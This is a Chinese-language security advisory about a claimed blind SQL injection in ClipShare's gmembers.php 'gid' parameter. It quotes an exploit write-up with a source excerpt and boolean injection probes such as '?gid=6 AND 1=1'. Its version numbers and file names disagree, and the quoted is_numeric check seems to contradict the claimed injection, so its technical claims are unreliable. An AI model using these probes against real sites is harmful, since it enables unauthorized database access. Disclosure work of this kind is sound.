ClipShare 'gid'参数SQL注入漏洞

发布日期:2013-03-25
更新日期:2013-03-26

受影响系统:
clipshare ClipShare 4.1.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 58681
 
ClipShare是开启视频共享社区网站的脚本。
 
ClipShare 4.1.1 (gmembers.php)在实现上存在SQL盲注漏洞,在添加组到社区时会受到此漏洞的影响。要利用此漏洞必须在服务器端关闭MAGIC_QUOTES_GPC指令。
 
<*来源:Esac
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# Exploit Title: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability
 # Exploit Author: Esac
 # Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
 # Official site:
 # Software License: Commercial.
 #all versions are vulnerable:
 #Note : this vulnerable work just if there is a group added to the community
 #Last Checked: 24 March 2013

#to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)

==============================================================================================

#Vulnerable Script:
 PHP script : members.php  on line 23

=========================== BEGIN OF gmembers.php =============================================

<?php
 /************************************************************************************************
 | Software Name        : ClipShare - Video Sharing Community Script
 | Software Author      : Clip-Share.Com / ScriptXperts.Com
 | Website              :
 | E-mail              : office@clip-share.com
 |**************************************************************************************************
 | This source file is subject to the ClipShare End-User License Agreement, available online at:
 |
 | By using this software, you acknowledge having read this Agreement and agree to be bound thereby.
 |**************************************************************************************************
 | Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.
 |**************************************************************************************************/

require('include/config.php');
 require('include/function.php');
 require('classes/pagination.class.php');
 require('language/' .$_SESSION['language']. '/gmembers.lang.php');

$gname  = NULL;
 $gurl  = NULL;
 $oid    = NULL;
 $gid    = ( isset($_REQUEST['gid']) && is_numeric($_REQUEST['gid']) ) ? mysql_real_escape_string($_REQUEST['gid']) : NULL;
 $sql    = "SELECT * FROM group_own WHERE GID='" .$gid. "' limit 1";
 $rs    = $conn->execute($sql);
 if ( $conn->Affected_Rows() == 1 ) {
    $urlkey    = $rs->fields['gurl'];
    $gname      = $rs->fields['gname'];
    $gupload    = $rs->fields['gupload'];
    $oid        = $rs->fields['OID'];
    STemplate::assign('gname', $gname);
    STemplate::assign('gurl', $urlkey);
    STemplate::assign('gupload', $gupload);
 } else {
    session_write_close();
    header('Location: ' .$config['BASE_URL']. '/error.php?type=group_missing');
    die();
 }
 ...........................................;
 ...............................................
 
 ?>

============================================================================================================


 
 Poc :

?gid=6 [Blind SQLi]

Real exploitation :

?gid=6 AND 1=1
 ==> return normal page

?gid=6 AND 1=2
 ==> return page with some errors ( or with nothing - white page )

--------------------------------------------------------------------------------------
 PwnEd.
 Tested version:
 Sunday , March 24, 2013 | Version: 4.1.4 | Username: admin | Logout
 Copyright &#169; 2006-2008 ClipShare. All rights reserved.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetz : White Tarbouch Team

./Esac

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
clipshare
 ---------
 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://127.0.0.1/wyydzp.html